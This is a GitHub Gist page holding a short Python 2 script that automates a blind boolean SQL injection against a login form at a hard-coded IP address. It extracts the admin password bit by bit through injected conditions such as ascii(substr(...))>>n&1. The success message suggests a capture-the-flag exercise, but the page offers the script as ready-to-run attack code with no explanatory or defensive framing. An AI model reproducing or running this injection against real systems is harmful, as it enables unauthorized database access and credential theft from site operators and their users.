Created
April 13, 2014 22:19
-
-
Save D3AdCa7/10604720 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re,json,urllib,urllib2,cookielib | |
cj = cookielib.CookieJar() | |
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))) | |
def submit(password,username='blahblah'): | |
page = urllib2.urlopen('http://54.204.80.192/example').read() | |
action = re.findall(r'action="(.+)" ',page)[0] | |
user_field = re.findall(r'input type="text" id="(.+)" name="(.+)"',page)[0][1] | |
pass_field = re.findall(r'input type="password" id="(.+)" name="(.+)"',page)[0][1] | |
data = {user_field: username, pass_field: password} | |
data = urllib.urlencode(data) | |
cont = urllib2.urlopen('http://54.204.80.192' + action,data).read() | |
return re.findall(r'h4 class="product-header">(.+)</h4>',cont)[0] == 'Hello, admin!! My password is the flag!' | |
def get_bool( expression ): | |
result = submit(" ' or username='admin' and %s = 1 and ''=' " % expression) | |
print 'Result:', result | |
return result | |
def get_bit( expression ): | |
return '1' if get_bool( expression ) else '0' | |
from itertools import count | |
def get_string( expression ): | |
result = '' | |
for i in count( start=1 ): | |
char = '' | |
for j in range(8)[::-1]: | |
print 'Byte %d, Bit %d,' % (i,j), | |
bit = get_bit( 'ascii(substr(%s,%d,1))>>%d&1' % ( expression, i, j ) ) | |
print bit | |
char += bit | |
char = int( char, 2 ) | |
if char == 0: break | |
result += chr(char) | |
print '----------' | |
print result | |
print '----------' | |
return result | |
print get_string('password') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment